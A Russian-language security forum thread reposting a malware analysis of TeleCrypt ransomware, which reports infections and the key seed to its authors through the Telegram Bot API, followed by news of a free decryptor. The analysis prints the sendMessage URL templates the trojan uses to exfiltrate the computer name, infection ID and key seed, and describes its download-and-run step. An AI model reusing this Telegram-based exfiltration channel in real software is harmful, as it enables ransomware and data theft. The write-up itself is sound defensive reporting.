1. Администрация SafeZone приветствует вас на нашем форуме!
    Если вы больше не желаете видеть рекламу при просмотре тем и сообщений - то достаточно просто зарегистрироваться. Для зарегистрированных пользователей реклама не отображается.
    Если у вас возникли проблемы с регистрацией на форуме - то вы можете сообщить об этом с помощью этой формы без авторизации,администрация форума обязательно отреагирует на вашу проблему.
    Скрыть объявление

Первый шифровальщик, использующий Telegram

Тема в разделе "Вирусы-шифровальщики", создана пользователем mike 1, 9 ноя 2016.

  1. mike 1
    Оффлайн

    mike 1 Активный пользователь

    Сообщения:
    2.516
    Симпатии:
    909
    Баллы:
    233
    В общем случае шифровальщики можно разделить на две группы:

    1. Шифровальщики, которые поддерживают офлайн-шифрование
    2. Шифровальщики, которые не поддерживают офлайн-шифрование
    Необходимость использования интернета для шифрования файлов пользователя обусловлена несколькими причинами. Например, злоумышленники могут отправлять шифровальщику ключ для шифрования и получать от него информацию для последующей расшифровки файлов жертвы.

    Очевидно, что для получения данных от зловреда на стороне вирусописателя необходим специальный сервис. Данный сервис должен быть защищен от сторонних исследователей, что требует от злоумышленников дополнительных затрат на его разработку.

    В этом месяце мы обнаружили нацеленный на российских пользователей шифровальщик, одна из особенностей которого – использование протокола мессенджера Telegram для отправки злоумышленнику ключа для расшифровки.

    Это первый известный нам случай использования протокола Telegram шифровальщиками.

    Анализ файла


    роянец написан на Delphi и имеет размер более 3Мб. После запуска зловред генерирует ключ для шифрования файлов и идентификатор заражения infection_id.

    Далее он связывается со злоумышленниками с помощью публично доступного Telegram Bot API. То есть, по сути, троянец выполняет функции бота Telegram и посредством публичного API отправляет сообщения своим создателям.

    Для этого злоумышленники заранее создали «бот Telegram». Они получили от серверов Telegram уникальный токен, который однозначно идентифицирует вновь созданного бота, и поместили его в тело троянца, чтобы он мог использовать API Telegram.

    Сначала троянец отправляет запрос на адрес https://api.telegram.org/bot<token>/GetMe, где <token> – это уникальный идентификатор Telegram-бота, созданного злоумышленниками. Согласно официальной документации API, метод getMe позволяет проверить, существует ли бот с заданным токеном, и получить о нем базовую информацию. Троянец никак не использует возвращаемую сервером информацию о боте.

    Следующий запрос троянец отправляет, используя метод sendMessage, позволяющий боту посылать сообщения в чат с заданным номером. Зловред использует зашитый в его теле номер чата и рапортует своим создателям о факте заражения:

    https://api.telegram.org/bot<token>/sendmessage?chat_id=<chat>&text=<computer_name>_<infection_id>_<key_seed>

    Параметры, передаваемые троянцем:

    <chat> — номер чата со злоумышленником;

    <computer_name> — имя зараженного компьютера;

    <infection_id> — идентификатор заражения;

    <key_seed> — число, на основе которого был сгенерирован ключ для шифрования файлов.

    Когда информация отправлена, зловред ищет на дисках файлы заданных расширений и побайтово шифрует их простейшим алгоритмом сложения с байтами ключа.

    [​IMG]
    Расширения файлов для шифрования

    В зависимости от настройки, троянец может добавлять зашифрованным файлам расширение «.Xcri» либо вообще не менять расширение. Найденный нами образец троянца расширение не меняет. Список зашифрованных файлов сохраняется в текстовом файле %USERPROFILE%\Desktop\База зашифр файлов.txt.

    После шифрования троянец отправляет запрос https://api.telegram.org/bot<token>/sendmessage?chat_id=<chat>&text=<computer_name>_<infection_id>_<key_seed>stop

    Все параметры аналогичны предыдущему запросу, но в конце добавлено слово «stop».

    Затем зловред скачивает со скомпрометированного сайта на WordPress дополнительный модуль Xhelp.exe (ссылка http://***.ru/wp-includes/random_compat/Xhelp.exe) и запускает его. Этот модуль – злоумышленники называют его «Информатор» – имеет графический интерфейс и сообщает жертве о произошедшем, а также выдвигает требования выкупа. Сумма составляет 5000 руб, а в качестве методов оплаты предлагаются Qiwi и Яндекс.Деньги.

    [​IMG]


    [​IMG]

    [​IMG]

    Сообщения, которые видит жертва злоумышленников
    Связь жертвы со злоумышленниками осуществляется через поле ввода в интерфейсе «Информатора». Реализована эта функциональность также через отправку Telegram-сообщения с помощью метода sendMessage.

    Обилие грамматических ошибок в тексте требований заставляет задуматься об уровне образования авторов троянца. Также привлекает внимание заявление «Спасибо что помогаете фонду юных программистов.»

    Заключение

    MD5:

    3e24d064025ec20d6a8e8bae1d19ecdb — Trojan-Ransom.Win32.Telecrypt.a (основной модуль)
    14d4bc13a12f8243383756de92529d6d — Trojan-Ransom.Win32.Telecrypt.a (модуль-информатор)

    Если вы стали жертвой данного шифровальщика, убедительная просьба – не платите злоумышленникам! Обратитесь в нашу службу поддержки, и мы поможем расшифровать ваши файлы.

    Источник: Первый шифровальщик, использующий Telegram
     
    SNS-amigo, Dragokas и orderman нравится это.
  2. Severnyj
    Оффлайн

    Severnyj Команда форума Супер-Модератор Ассоциация VN/VIP

    Сообщения:
    8.469
    Симпатии:
    9.188
    Баллы:
    663
    Эксперт свел на нет все труды создателей шифровальщика TeleCrypt
    [​IMG]

    Выпущен инструмент для восстановления файлов, зашифрованных TeleCrypt.

    Эксперт компании Malwarebytes Нэйтан Скотт (Nathan Scott) взломал вымогательское ПО TeleCrypt и выпустил инструмент для восстановления зашифрованных им файлов. Троян был обнаружен ранее в ноябре исследователями «Лаборатории Касперского».

    В отличие от большинства вымогателей, для подключения к C&C-серверу TeleCrypt использует не базирующиеся на HTTP протоколы, а API популярного мессенджера Telegram. Инфицировав компьютер жертвы, он выводит на экран сообщение на русском языке с требованием оказать помощь «молодым программистам» и заплатить 5 тыс. руб.

    TeleCrypt распространяется в виде исполняемого файла с помощью электронной почты, эксплоитов и атак «drive by downloads». После установки трояна на рабочем столе компьютера появляется документ «База зашифр файлов.txt», содержащий список всех зашифрованных файлов.

    Не прошло и месяца с момента выхода шифровальщика, как был выпущен дешифратор. Воспользоваться им можно при наличии платформы .NET. Для получения ключа также необходимы незашифрованные версии зашифрованных файлов.

    Эксперт свел на нет все труды создателей шифровальщика TeleCrypt
     
    SNS-amigo нравится это.

Поделиться этой страницей